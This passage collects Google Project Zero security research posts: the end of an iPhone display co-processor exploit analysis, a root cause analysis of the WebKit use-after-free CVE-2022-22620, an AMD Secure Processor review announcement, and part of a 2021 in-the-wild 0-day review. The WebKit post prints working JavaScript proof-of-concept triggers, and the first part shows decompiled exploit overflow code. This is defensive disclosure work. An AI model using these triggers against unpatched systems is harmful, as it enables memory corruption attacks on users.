How much input is consumed? The input is fully consumed with no "rewinding" so it's 3*0x46*0x46*4 = 0xe5b0 bytes. Working backwards from the end of that buffer we know that the final 0x34 bytes of it go off the end of the 0xc608 allocation which means +0xe57c in the input buffer will be the first byte which corrupts the 8 metadata bytes and +0x8584 will be the first byte to corrupt the next object:


A diagram showing that the end of the overflower object overlaps with the metadata and start of the target object.

This matches up exactly with the overflow object which the exploit builds:


  v24 = address + 0xE584;

  v25 = *(_DWORD *)&v54[48];

  v26 = *(_OWORD *)&v54[32];

  v27 = *(_OWORD *)&v54[16];

  *(_OWORD *)(address + 0xE584) = *(_OWORD *)v54;

  *(_OWORD *)(v24 + 16) = v27;

  *(_OWORD *)(v24 + 32) = v26;

  *(_DWORD *)(v24 + 48) = v25;


The destination object seems to be allocated very early and the DCP RTKit environment appears to be very deterministic with no ASLR. Almost certainly they are attempting to corrupt a neighbouring C++ object with a fake vtable pointer.


Unfortunately for our analysis the trail goes cold here and we can't fully recreate the rest of the exploit. The bytes for the fake DCP C++ object are read from a file in the app's temporary directory (base64 encoded inside a JSON file under the exploit_struct_offsets key) and I don't have a copy of that file. But based on the flow of the rest of the exploit it's pretty clear what happens next:

sudo make me a DART mapping

The DCP, like other coprocessors on iPhone, sits behind a DART (Device Address Resolution Table.) This is like an SMMU (IOMMU in the x86 world) which forces an extra layer of physical address lookup between the DCP and physical memory. DART was covered in great detail in Gal Beniamini's Over The Air - Vol. 2, Pt. 3 blog post.


The DCP clearly needs to access lots of buffers owned by userspace tasks as well as memory managed by the kernel. To do this the DCP makes RPC calls back to the AP which modifies the DART entries accordingly. This appears to be exactly what the DCP exploit does: the D45X family of DCP->AP RPC methods appear to expose an interface for requesting arbitrary physical as well as virtual addresses to be mapped into the DCP DART.


The fake C++ object is most likely a stub which makes such calls on behalf of the exploit, allowing the exploit to read and write kernel memory.

Conclusions

Segmentation and isolation are in general a positive thing when it comes to security. However, splitting up an existing system into separate, intercommunicating parts can end up exposing unexpected code in unexpected ways.


We've had discussions within Project Zero about whether this DCP vulnerability is interesting at all. After all, if the UniformityCompensator code was going to be running on the Application Processors anyway then the Display Co-Processor didn't really introduce or cause this bug.


Whilst that's true, it's also the case that the DCP certainly made exploitation of this bug significantly easier and more reliable than it would have been on the AP. Apple has invested heavily in memory corruption mitigations over the last few years, so moving an attack surface from a "mitigation heavy" environment to a "mitigation light" one is a regression in that sense.


Another perspective is that the DCP just isn't isolated enough; perhaps the intention was to try to isolate the code on the DCP such that even if it's compromised it's limited in the effect it could have on the entire system. For example, there might be models where the DCP to AP RPC interface is much more restricted.


But again there's a tradeoff: the more restrictive the RPC API, the more the DCP code has to be refactored - a significant investment. Currently, the codebase relies on being able to map arbitrary memory and the API involves passing userspace pointers back and forth.


I've discussed in recent posts how attackers tend to be ahead of the curve. As the curve slowly shifts towards memory corruption exploitation getting more expensive, attackers are likely shifting too. We saw that in the logic-bug sandbox escape used by NSO and we see that here in this memory-corruption-based privilege escalation that side-stepped kernel mitigations by corrupting memory on a co-processor instead. Both are quite likely to continue working in some form in a post-memory tagging world. Both reveal the stunning depth of attack surface available to the motivated attacker. And both show that defensive security research still has a lot of work to do.

An Autopsy on a Zombie In-the-Wild 0-day

14 June 2022 at 16:00

Posted by Maddie Stone, Google Project Zero

Whenever there’s a new in-the-wild 0-day disclosed, I’m very interested in understanding the root cause of the bug. This allows us to then understand if it was fully fixed, look for variants, and brainstorm new mitigations. This blog is the story of a “zombie” Safari 0-day and how it came back from the dead to be disclosed as exploited in-the-wild in 2022. CVE-2022-22620 was initially fixed in 2013, reintroduced in 2016, and then disclosed as exploited in-the-wild in 2022. If you’re interested in the full root cause analysis for CVE-2022-22620, we’ve published it here.

In the 2020 Year in Review of 0-days exploited in the wild, I wrote how 25% of all 0-days detected and disclosed as exploited in-the-wild in 2020 were variants of previously disclosed vulnerabilities. Almost halfway through 2022 and it seems like we’re seeing a similar trend. Attackers don’t need novel bugs to effectively exploit users with 0-days, but instead can use vulnerabilities closely related to previously disclosed ones. This blog focuses on just one example from this year because it’s a little bit different from other variants that we’ve discussed before. Most variants we’ve discussed previously exist due to incomplete patching. But in this case, the variant was completely patched when the vulnerability was initially reported in 2013. However, the variant was reintroduced 3 years later during large refactoring efforts. The vulnerability then continued to exist for 5 years until it was fixed as an in-the-wild 0-day in January 2022.

Getting Started

In the case of CVE-2022-22620 I had two pieces of information to help me figure out the vulnerability: the patch (thanks to Apple for sharing with me!) and the description from the security bulletin stating that the vulnerability is a use-after-free. The primary change in the patch was to change the type of the second argument (stateObject) to the function FrameLoader::loadInSameDocument from a raw pointer, SerializedScriptValue* to a reference-counted pointer, RefPtr<SerializedScriptValue>.

trunk/Source/WebCore/loader/FrameLoader.cpp 

1094

1094

// This does the same kind of work that didOpenURL does, except it relies on the fact

1095

1095

// that a higher level already checked that the URLs match and the scrolling is the right thing to do.

1096

 

void FrameLoader::loadInSameDocument(const URL& url, SerializedScriptValue* stateObject, bool isNewNavigation)

 

1096

void FrameLoader::loadInSameDocument(URL url, RefPtr<SerializedScriptValue> stateObject, bool isNewNavigation)

Whenever I’m doing a root cause analysis on a browser in-the-wild 0-day, along with studying the code, I also usually search through commit history and bug trackers to see if I can find anything related. I do this to try and understand when the bug was introduced, but also to try and save time. (There’s a lot of 0-days to be studied! 😀)

The Previous Life

In the case of CVE-2022-22620, I was scrolling through the git blame view of FrameLoader.cpp. Specifically I was looking at the definition of loadInSameDocument. When looking at the git blame for this line prior to our patch, it’s a very interesting commit. The commit was actually changing the stateObject argument from a reference-counted pointer, PassRefPtr<SerializedScriptValue>, to a raw pointer, SerializedScriptValue*. This change from December 2016 introduced CVE-2022-22620. The Changelog even states:


(WebCore::FrameLoader::loadInSameDocument): Take a raw pointer for the

serialized script value state object. No one was passing ownership.

But pass it along to statePopped as a Ref since we need to pass ownership

of the null value, at least for now.

Now I was intrigued and wanted to track down the previous commit that had changed the stateObject argument to PassRefPtr<SerializedScriptValue>. I was in luck and only had to go back in the history two more steps. There was a commit from 2013 that changed the stateObject argument from the raw pointer, SerializedScriptValue*, to a reference-counted pointer, PassRefPtr<SerializedScriptValue>. This commit from February 2013 was doing the same thing that our commit in 2022 was doing. The commit was titled “Use-after-free in SerializedScriptValue::deserialize” and included a good description of how that use-after-free worked.

The commit also included a test:

Added a test that demonstrated a crash due to use-after-free

of SerializedScriptValue.

Test: fast/history/replacestate-nocrash.html

The trigger from this test is:

Object.prototype.__defineSetter__("foo",function(){history.replaceState("", "")});

history.replaceState({foo:1,zzz:"a".repeat(1<<22)}, "");

history.state.length;

My hope was that the test would crash the vulnerable version of WebKit and I’d be done with my root cause analysis and could move on to the next bug. Unfortunately, it didn’t crash.

The commit description included the comment to check out a Chromium bug. (During this time Chromium still used the WebKit rendering engine. Chromium forked the Blink rendering engine in April 2013.) I saw that my now Project Zero teammate, Sergei Glazunov, originally reported the Chromium bug back in 2013, so I asked him for the details.

The use-after-free from 2013 (no CVE was assigned) was a bug in the implementation of the History API. This API allows access to (and modification of) a stack of the pages visited in the current frame, and these page states are stored as a SerializedScriptValue. The History API exposes a getter for state, and a method replaceState which allows overwriting the "most recent" history entry.

The bug was that in the implementation of the getter for
state, SerializedScriptValue::deserialize was called on the current "most recent" history entry value without increasing its reference count. As SerializedScriptValue::deserialize could trigger a callback into user JavaScript, the callback could call replaceState to drop the only reference to the history entry value by replacing it with a new value. When the callback returned, the rest of SerializedScriptValue::deserialize ran with a free'd this pointer.

In order to fix this bug, it appears that the developers decided to change every caller of SerializedScriptValue::deserialize to increase the reference count on the stateObject by changing the argument types from a raw pointer to PassRefPtr<SerializedScriptValue>.  While the originally reported trigger called deserialize on the stateObject through the V8History::stateAccessorGetter function, the developers’ fix also caught and patched the path to deserialize through loadInSameDocument.

The timeline of the changes impacting the stateObject is:

  • HistoryItem.m_stateObject is type RefPtr<SerializedScriptValue>
  • HistoryItem::stateObject() returns SerializedScriptValue*
  • FrameLoader::loadInSameDocument takes stateObject argument as SerializedScriptValue*
  • HistoryItem::stateObject returns a PassRefPtr<SerializedScriptValue>
  • FrameLoader::loadInSameDocument takes stateObject argument as PassRefPtr<SerializedScriptValue>
  • HistoryItem::stateObject returns RefPtr instead of PassRefPtr
  • HistoryItem::stateObject() is changed to return raw pointer instead of RefPtr
  • FrameLoader::loadInSameDocument changed to take stateObject as a raw pointer instead of PassRefPtr<SerializedScriptValue>
  • FrameLoader::loadInSameDocument changed to take stateObject as a RefPtr<SerializedScriptValue>

The Autopsy

When we look at the timeline of changes for FrameLoader::loadInSameDocument it seems that the bug was re-introduced in December 2016 due to refactoring. The question is, why did the patch author think that loadInSameDocument would not need to hold a reference. From the December 2016 commit ChangeLog: Take a raw pointer for the serialized script value state object. No one was passing ownership.

My assessment is that it’s due to the October 2016 changes in HistoryItem:stateObject. When the author was evaluating the refactoring changes needed in the dom directory in December 2016, it would have appeared that the only calls to loadInSameDocument passed in either a null value or the result of stateObject() which as of October 2016 now passed a raw SerializedScriptValue* pointer. When looking at those two options for the type of an argument, then it’s potentially understandable that the developer thought that loadInSameDocument did not need to share ownership of stateObject.

So why then was HistoryItem::stateObject’s return value changed from a RefPtr to a raw pointer in October 2016? That I’m struggling to find an explanation for.

According to the description, the patch in October 2016 was intended to “Replace all uses of ExceptionCodeWithMessage with WebCore::Exception”. However when we look at the ChangeLog it seems that the author decided to also do some (seemingly unrelated) refactoring to HistoryItem. These are some of the only changes in the commit whose descriptions aren’t related to exceptions. As an outsider looking at the commits, it seems that the developer by chance thought they’d do a little “clean-up” while working through the required refactoring on the exceptions. If this was simply an additional ad-hoc step while in the code, rather than the goal of the commit, it seems plausible that the developer and reviewers may not have further traced the full lifetime of HistoryItem::stateObject.

While the change to HistoryItem in October 2016 was not sufficient to introduce the bug, it seems that that change likely contributed to the developer in December 2016 thinking that loadInSameDocument didn’t need to increase the reference count on the stateObject.

Both the October 2016 and the December 2016 commits were very large. The commit in October changed 40 files with 900 additions and 1225 deletions. The commit in December changed 95 files with 1336 additions and 1325 deletions. It seems untenable for any developers or reviewers to understand the security implications of each change in those commits in detail, especially since they’re related to lifetime semantics.

The Zombie

We’ve now tracked down the evolution of changes to fix the 2013 vulnerability…and then revert those fixes… so I got back to identifying the 2022 bug. It’s the same bug, but triggered through a different path. That’s why the 2013 test case wasn’t crashing the version of WebKit that should have been vulnerable to CVE-2022-22620:

  1. The 2013 test case triggers the bug through the V8History::stateAccessorAndGetter path instead of FrameLoader::loadInSameDocument, and
  2. As a part of Sergei’s 2013 bug report there were additional hardening measures put into place that prevented user-code callbacks being processed during deserialization. 

Therefore we needed to figure out how to call loadInSameDocument and instead of using the deserialization to trigger a JavaScript callback, we needed to find another event in the loadInSameDocument function that would trigger the callback to user JavaScript.

To quickly figure out how to call loadInSameDocument, I modified the WebKit source code to trigger a test failure if loadInSameDocument was ever called and then ran all the tests in the fast/history directory. There were 5 out of the 80 tests that called loadInSameDocument:

The tests history-back-forward-within-subframe-hash.html and fast/history/history-traversal-is-asynchronous.html were the most helpful. We can trigger the call to loadInSameDocument by setting the history stack with an object whose location is the same page, but includes a hash. We then call history.back() to go back to that state that includes the URL with the hash. loadInSamePage is responsible for scrolling to that location.

history.pushState("state1", "", location + "#foo");

history.pushState("state2", ""); // current state

history.back(); //goes back to state1, triggering loadInSameDocument

 

Now that I knew how to call loadInSameDocument, I teamed up with Sergei to identify how we could get user code execution sometime during the loadInSameDocument function, but prior to the call to statePopped (FrameLoader.cpp#1158):

m_frame.document()->statePopped(stateObject ? Ref<SerializedScriptValue> { *stateObject } : SerializedScriptValue::nullValue());

The callback to user code would have to occur prior to the call to statePopped because stateObject was cast to a reference there and thus would now be reference-counted. We assumed that this would be the place where the “freed” object was “used”.

If you go down the rabbit hole of the calls made in loadInSameDocument, we find that there is a path to the blur event being dispatched. We could have also used a tool like CodeQL to see if there was a path from loadInSameDocument to dispatchEvent, but in this case we just used manual auditing. The call tree to the blur event is:

FrameLoader::loadInSameDocument

  FrameLoader::scrollToFragmentWithParentBoundary

    FrameView::scrollToFragment

      FrameView::scrollToFragmentInternal

        FocusController::setFocusedElement

          FocusController::setFocusedFrame

            dispatchWindowEvent(Event::create(eventNames().blurEvent, Event::CanBubble::No, Event::IsCancelable::No));

The blur event fires on an element whenever focus is moved from that element to another element. In our case loadInSameDocument is triggered when we need to scroll to a new location within the current page. If we’re scrolling and therefore changing focus to a new element, the blur event is fired on the element that previously had the focus.

The last piece for our trigger is to free the stateObject in the onblur event handler. To do that we call replaceState, which overwrites the current history state with a new object. This causes the final reference to be dropped on the stateObject and it’s therefore free’d. loadInSameDocument still uses the free’d stateObject in its call to statePopped.

input = document.body.appendChild(document.createElement("input"));

a = document.body.appendChild(document.createElement("a"));

a.id = "foo";

history.pushState("state1", "", location + "#foo");

history.pushState("state2", "");

setTimeout(() => {

        input.focus();

        input.onblur = () => history.replaceState("state3", "");

        setTimeout(() => history.back(), 1000);

}, 1000);

In both the 2013 and 2022 cases, the root vulnerability is that the stateObject is not correctly reference-counted. In 2013, the developers did a great job of patching all the different paths to trigger the vulnerability, not just the one in the submitted proof-of-concept. This meant that they had also killed the vulnerability in loadInSameDocument. The refactoring in December 2016 then revived the vulnerability to enable it to be exploited in-the-wild and re-patched in 2022.

Conclusion

Usually when we talk about variants, they exist due to incomplete patches: the vendor doesn’t correctly and completely fix the reported vulnerability. However, for CVE-2022-22620 the vulnerability was correctly and completely fixed in 2013. Its fix was just regressed in 2016 during refactoring. We don’t know how long an attacker was exploiting this vulnerability in-the-wild, but we do know that the vulnerability existed (again) for 5 years: December 2016 until January 2022.

There’s no easy answer for what should have been done differently. The developers responding to the initial bug report in 2013 followed a lot of best-practices:

  • Patched all paths to trigger the vulnerability, not just the one in the proof-of-concept. This meant that they patched the variant that would become CVE-2022-22620.
  • Submitted a test case with the patch.
  • Detailed commit messages explaining the vulnerability and how they were fixing it.
  • Additional hardening measures during deserialization.

As an offensive security research team, we can make assumptions about what we believe to be the core challenges facing modern software development teams: legacy code, short reviewer turn-around expectations, refactoring and security efforts are generally under-appreciated and under-rewarded, and lack of memory safety mitigations. Developers and security teams need time to review patches, especially for security issues, and rewarding these efforts, will make a difference. It also will save the vendor resources in the long run. In this case, 9 years after a vulnerability was initially triaged, patched, tested, and released, the whole process had to be duplicated again, but this time under the pressure of in-the-wild exploitation.

While this case study was a 0-day in Safari/WebKit, this is not an issue unique to Safari. Already in 2022, we’ve seen in-the-wild 0-days that are variants of previously disclosed bugs targeting Chromium, Windows, Pixel, and iOS as well. It’s a good reminder that as defenders we all need to stay vigilant in reviewing and auditing code and patches.

Release of Technical Report into the AMD Security Processor

By: Anonymous
10 May 2022 at 19:00

Posted by James Forshaw, Google Project Zero

Today, members of Project Zero and the Google Cloud security team are releasing a technical report on a security review of AMD Secure Processor (ASP). The ASP is an isolated ARM processor in AMD EPYC CPUs that adds a root of trust and controls secure system initialization. As it's a generic processor AMD can add additional security features to the firmware, but like with all complex systems it's possible these features might have security issues which could compromise the security of everything under the ASP's management.

The security review undertaken was on the implementation of the ASP on the 3rd Gen AMD EPYC CPUs (codenamed "Milan"). One feature of the ASP of interest to Google is Secure Encrypted Virtualization (SEV). SEV adds encryption to the memory used by virtual machines running on the CPU. This feature is of importance to Confidential Computing as it provides protection of customer cloud data in use, not just at rest or when sending data across a network.

A particular emphasis of the review was on the Secure Nested Paging (SNP) extension to SEV added to "Milan". SNP aims to further improve the security of confidential computing by adding integrity protection and mitigations for numerous side-channel attacks. The review was undertaken with full cooperation with AMD. The team was granted access to source code for the ASP, and production samples to test hardware attacks.

The review discovered 19 issues which have been fixed by AMD in public security bulletins. These issues ranged from incorrect use of cryptography to memory corruption in the context of the ASP firmware. The report describes some of the more interesting issues that were uncovered during the review as well as providing a background on the ASP and the process the team took to find security issues. You can read more about the review on the Google Cloud security blog and the final report.

The More You Know, The More You Know You Don’t Know

By: Anonymous
19 April 2022 at 16:06

A Year in Review of 0-days Used In-the-Wild in 2021

Posted by Maddie Stone, Google Project Zero

This is our third annual year in review of 0-days exploited in-the-wild [2020, 2019]. Each year we’ve looked back at all of the detected and disclosed in-the-wild 0-days as a group and synthesized what we think the trends and takeaways are. The goal of this report is not to detail each individual exploit, but instead to analyze the exploits from the year as a group, looking for trends, gaps, lessons learned, successes, etc. If you’re interested in the analysis of individual exploits, please check out our root cause analysis repository.

We perform and share this analysis in order to make 0-day hard. We want it to be more costly, more resource intensive, and overall more difficult for attackers to use 0-day capabilities. 2021 highlighted just how important it is to stay relentless in our pursuit to make it harder for attackers to exploit users with 0-days. We heard over and over and over about how governments were targeting journalists, minoritized populations, politicians, human rights defenders, and even security researchers around the world. The decisions we make in the security and tech communities can have real impacts on society and our fellow humans’ lives.

We’ll provide our evidence and process for our conclusions in the body of this post, and then wrap it all up with our thoughts on next steps and hopes for 2022 in the conclusion. If digging into the bits and bytes is not your thing, then feel free to just check-out the Executive Summary and Conclusion.

Executive Summary

2021 included the detection and disclosure of 58 in-the-wild 0-days, the most ever recorded since Project Zero began tracking in mid-2014. That’s more than double the previous maximum of 28 detected in 2015 and especially stark when you consider that there were only 25 detected in 2020. We’ve tracked publicly known in-the-wild 0-day exploits in this spreadsheet since mid-2014.

While we often talk about the number of 0-day exploits used in-the-wild, what we’re actually discussing is the number of 0-day exploits detected and disclosed as in-the-wild. And that leads into our first conclusion: we believe the large uptick in in-the-wild 0-days in 2021 is due to increased detection and disclosure of these 0-days, rather than simply increased usage of 0-day exploits.

With this record number of in-the-wild 0-days to analyze we saw that attacker methodology hasn’t actually had to change much from previous years. Attackers are having success using the same bug patterns and exploitation techniques and going after the same attack surfaces. Project Zero’s mission is “make 0day hard”. 0-day will be harder when, overall, attackers are not able to use public methods and techniques for developing their 0-day exploits. When we look over these 58 0-days used in 2021, what we see instead are 0-days that are similar to previous & publicly known vulnerabilities. Only two 0-days stood out as novel: one for the technical sophistication of its exploit and the other for its use of logic bugs to escape the sandbox.

So while we recognize the industry’s improvement in the detection and disclosure of in-the-wild 0-days, we also acknowledge that there’s a lot more improving to be done. Having access to more “ground truth” of how attackers are actually using 0-days shows us that they are able to have success by using previously known techniques and methods rather than having to invest in developing novel techniques. This is a clear area of opportunity for the tech industry.

We had so many more data points in 2021 to learn about attacker behavior than we’ve had in the past. Having all this data, though, has left us with even more questions than we had before. Unfortunately, attackers who actively use 0-day exploits do not share the 0-days they’re using or what percentage of 0-days we’re missing in our tracking, so we’ll never know exactly what proportion of 0-days are currently being found and disclosed publicly.

Based on our analysis of the 2021 0-days we hope to see the following progress in 2022 in order to continue taking steps towards making 0-day hard:

  1. All vendors agree to disclose the in-the-wild exploitation status of vulnerabilities in their security bulletins.
  2. Exploit samples or detailed technical descriptions of the exploits are shared more widely.
  3. Continued concerted efforts on reducing memory corruption vulnerabilities or rendering them unexploitable.Launch mitigations that will significantly impact the exploitability of memory corruption vulnerabilities.

A Record Year for In-the-Wild 0-days

2021 was a record year for in-the-wild 0-days. So what happened?

bar graph showing the number of in-the-wild 0-day detected per year from 2015-2021. The totals are taken from this tracking spreadsheet: https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit#gid=2129022708

Is it that software security is getting worse? Or is it that attackers are using 0-day exploits more? Or has our ability to detect and disclose 0-days increased? When looking at the significant uptick from 2020 to 2021, we think it's mostly explained by the latter. While we believe there has been a steady growth in interest and investment in 0-day exploits by attackers in the past several years, and that security still needs to urgently improve, it appears that the security industry's ability to detect and disclose in-the-wild 0-day exploits is the primary explanation for the increase in observed 0-day exploits in 2021.

While we often talk about “0-day exploits used in-the-wild”, what we’re actually tracking are “0-day exploits detected and disclosed as used in-the-wild”. There are more factors than just the use that contribute to an increase in that number, most notably: detection and disclosure. Better detection of 0-day exploits and more transparently disclosed exploited 0-day vulnerabilities is a positive indicator for security and progress in the industry.

Overall, we can break down the uptick in the number of in-the-wild 0-days into:

  • More detection of in-the-wild 0-day exploits
  • More public disclosure of in-the-wild 0-day exploitation

More detection

In the 2019 Year in Review, we wrote about the “Detection Deficit”. We stated “As a community, our ability to detect 0-days being used in the wild is severely lacking to the point that we can’t draw significant conclusions due to the lack of (and biases in) the data we have collected.” In the last two years, we believe that there’s been progress on this gap.

Anecdotally, we hear from more people that they’ve begun working more on detection of 0-day exploits. Quantitatively, while a very rough measure, we’re also seeing the number of entities credited with reporting in-the-wild 0-days increasing. It stands to reason that if the number of people working on trying to find 0-day exploits increases, then the number of in-the-wild 0-day exploits detected may increase.

A bar graph showing the number of distinct reporters of 0-day in-the-wild vulnerabilities per year for 2019-2021. 2019: 9, 2020: 10, 2021: 20. The data is taken from: https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit#gid=2129022708

a line graph showing how many in-the-wild 0-days were found by their own vendor per year from 2015 to 2021. 2015: 0, 2016: 0, 2017: 2, 2018: 0, 2019: 4, 2020: 5, 2021: 17. Data comes from: https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit#gid=2129022708

We’ve also seen the number of vendors detecting in-the-wild 0-days in their own products increasing. Whether or not these vendors were previously working on detection, vendors seem to have found ways to be more successful in 2021. Vendors likely have the most telemetry and overall knowledge and visibility into their products so it’s important that they are investing in (and hopefully having success in) detecting 0-days targeting their own products. As shown in the chart above, there was a significant increase in the number of in-the-wild 0-days discovered by vendors in their own products. Google discovered 7 of the in-the-wild 0-days in their own products and Microsoft discovered 10 in their products!

More disclosure

The second reason why the number of detected in-the-wild 0-days has increased is due to more disclosure of these vulnerabilities. Apple and Google Android (we differentiate “Google Android” rather than just “Google” because Google Chrome has been annotating their security bulletins for the last few years) first began labeling vulnerabilities in their security advisories with the information about potential in-the-wild exploitation in November 2020 and January 2021 respectively. When vendors don’t annotate their release notes, the only way we know that a 0-day was exploited in-the-wild is if the researcher who discovered the exploitation comes forward. If Apple and Google Android had not begun annotating their release notes, the public would likely not know about at least 7 of the Apple in-the-wild 0-days and 5 of the Android in-the-wild 0-days. Why? Because these vulnerabilities were reported by “Anonymous” reporters. If the reporters didn’t want credit for the vulnerability, it’s unlikely that they would have gone public to say that there were indications of exploitation. That is 12 0-days that wouldn’t have been included in this year’s list if Apple and Google Android had not begun transparently annotating their security advisories.

bar graph that shows the number of Android and Apple (WebKit + iOS + macOS) in-the-wild 0-days per year. The bar graph is split into two color: yellow for Anonymously reported 0-days and green for non-anonymous reported 0-days. 2021 is the only year with any anonymously reported 0-days. 2015: 0, 2016: 3, 2018: 2, 2019: 1, 2020: 3, 2021: Non-Anonymous: 8, Anonymous- 12. Data from: https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit#gid=2129022708

Kudos and thank you to Microsoft, Google Chrome, and Adobe who have been annotating their security bulletins for transparency for multiple years now! And thanks to Apache who also annotated their release notes for CVE-2021-41773 this past year.

In-the-wild 0-days in Qualcomm and ARM products were annotated as in-the-wild in Android security bulletins, but not in the vendor’s own security advisories.

It's highly likely that in 2021, there were other 0-days that were exploited in the wild and detected, but vendors did not mention this in their release notes. In 2022, we hope that more vendors start noting when they patch vulnerabilities that have been exploited in-the-wild. Until we’re confident that all vendors are transparently disclosing in-the-wild status, there’s a big question of how many in-the-wild 0-days are discovered, but not labeled publicly by vendors.

New Year, Old Techniques

We had a record number of “data points” in 2021 to understand how attackers are actually using 0-day exploits. A bit surprising to us though, out of all those data points, there was nothing new amongst all this data. 0-day exploits are considered one of the most advanced attack methods an actor can use, so it would be easy to conclude that attackers must be using special tricks and attack surfaces. But instead, the 0-days we saw in 2021 generally followed the same bug patterns, attack surfaces, and exploit “shapes” previously seen in public research. Once “0-day is hard”, we’d expect that to be successful, attackers would have to find new bug classes of vulnerabilities in new attack surfaces using never before seen exploitation methods. In general, that wasn't what the data showed us this year. With two exceptions (described below in the iOS section) out of the 58, everything we saw was pretty “meh” or standard.

Out of the 58 in-the-wild 0-days for the year, 39, or 67% were memory corruption vulnerabilities. Memory corruption vulnerabilities have been the standard for attacking software for the last few decades and it’s still how attackers are having success. Out of these memory corruption vulnerabilities, the majority also stuck with very popular and well-known bug classes:

  • 17 use-after-free
  • 6 out-of-bounds read & write
  • 4 buffer overflow
  • 4 integer overflow

In the next sections we’ll dive into each major platform that we saw in-the-wild 0-days for this year. We’ll share the trends and explain why what we saw was pretty unexceptional.

Chromium (Chrome)

Chromium had a record high number of 0-days detected and disclosed in 2021 with 14. Out of these 14, 10 were renderer remote code execution bugs, 2 were sandbox escapes, 1 was an infoleak, and 1 was used to open a webpage in Android apps other than Google Chrome.

The 14 0-day vulnerabilities were in the following components:

When we look at the components targeted by these bugs, they’re all attack surfaces seen before in public security research and previous exploits. If anything, there are a few less DOM bugs and more targeting these other components of browsers like IndexedDB and WebGL than previously. 13 out of the 14 Chromium 0-days were memory corruption bugs. Similar to last year, most of those memory corruption bugs are use-after-free vulnerabilities.

A couple of the Chromium bugs were even similar to previous in-the-wild 0-days. CVE-2021-21166 is an issue in ScriptProcessorNode::Process() in webaudio where there’s insufficient locks such that buffers are accessible in both the main thread and the audio rendering thread at the same time. CVE-2019-13720 is an in-the-wild 0-day from 2019. It was a vulnerability in ConvolverHandler::Process() in webaudio where there were also insufficient locks such that a buffer was accessible in both the main thread and the audio rendering thread at the same time.

CVE-2021-30632 is another Chromium in-the-wild 0-day from 2021. It’s a type confusion in the  TurboFan JIT in Chromium’s JavaScript Engine, v8, where Turbofan fails to deoptimize code after a property map is changed. CVE-2021-30632 in particular deals with code that stores global properties. CVE-2020-16009 was also an in-the-wild 0-day that was due to Turbofan failing to deoptimize code after map deprecation.

WebKit (Safari)

Prior to 2021, Apple had only acknowledged 1 publicly known in-the-wild 0-day targeting WebKit/Safari, and that was due the sharing by an external researcher. In 2021 there were 7. This makes it hard for us to assess trends or changes since we don’t have historical samples to go off of. Instead, we’ll look at 2021’s WebKit bugs in the context of other Safari bugs not known to be in-the-wild and other browser in-the-wild 0-days.

The 7 in-the-wild 0-days targeted the following components:

The one semi-surprise is that no DOM bugs were detected and disclosed. In previous years, vulnerabilities in the DOM engine have generally made up 15-20% of the in-the-wild browser 0-days, but none were detected and disclosed for WebKit in 2021.

It would not be surprising if attackers are beginning to shift to other modules, like third party libraries or things like IndexedDB. The modules may be more promising to attackers going forward because there’s a better chance that the vulnerability may exist in multiple browsers or platforms. For example, the webaudio bug in Chromium, CVE-2021-21166, also existed in WebKit and was fixed as CVE-2021-1844, though there was no evidence it was exploited in-the-wild in WebKit. The IndexedDB in-the-wild 0-day that was used against Safari in 2021, CVE-2021-30858, was very, very similar to a bug fixed in Chromium in January 2020.

Internet Explorer

Since we began tracking in-the-wild 0-days, Internet Explorer has had a pretty consistent number of 0-days each year. 2021 actually tied 2016 for the most in-the-wild Internet Explorer 0-days we’ve ever tracked even though Internet Explorer’s market share of web browser users continues to decrease.

Bar graph showing the number of Internet Explorer itw 0-days discovered per year from 2015-2021. 2015: 3, 2016: 4, 2017: 3, 2018: 1, 2019: 3, 2020: 2, 2021: 4. Data from: https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit#gid=2129022708

So why are we seeing so little change in the number of in-the-wild 0-days despite the change in market share? Internet Explorer is still a ripe attack surface for initial entry into Windows machines, even if the user doesn’t use Internet Explorer as their Internet browser. While the number of 0-days stayed pretty consistent to what we’ve seen in previous years, the components targeted and the delivery methods of the exploits changed. 3 of the 4 0-days seen in 2021 targeted the MSHTML browser engine and were delivered via methods other than the web. Instead they were delivered to targets via Office documents or other file formats.

The four 0-days targeted the following components:

For CVE-2021-26411 targets of the campaign initially received a .mht file, which prompted the user to open in Internet Explorer. Once it was opened in Internet Explorer, the exploit was downloaded and run. CVE-2021-33742 and CVE-2021-40444 were delivered to targets via malicious Office documents.

CVE-2021-26411 and CVE-2021-33742 were two common memory corruption bug patterns: a use-after-free due to a user controlled callback in between two actions using an object and the user frees the object during that callback and a buffer overflow.

There were a few different vulnerabilities used in the exploit chain that used CVE-2021-40444, but the one within MSHTML was that as soon as the Office document was opened the payload would run: a CAB file was downloaded, decompressed, and then a function from within a DLL in that CAB was executed. Unlike the previous two MSHTML bugs, this was a logic error in URL parsing rather than a memory corruption bug.

Windows

Windows is the platform where we’ve seen the most change in components targeted compared with previous years. However, this shift has generally been in progress for a few years and predicted with the end-of-life of Windows 7 in 2020 and thus why it’s still not especially novel.

In 2021 there were 10 Windows in-the-wild 0-days targeting 7 different components:

The number of different components targeted is the shift from past years. For example, in 2019 75% of Windows 0-days targeted Win32k while in 2021 Win32k only made up 20% of the Windows 0-days. The reason that this was expected and predicted was that 6 out of 8 of those 0-days that targeted Win32k in 2019 did not target the latest release of Windows 10 at that time; they were targeting older versions. With Windows 10 Microsoft began dedicating more and more resources to locking down the attack surface of Win32k so as those older versions have hit end-of-life, Win32k is a less and less attractive attack surface.

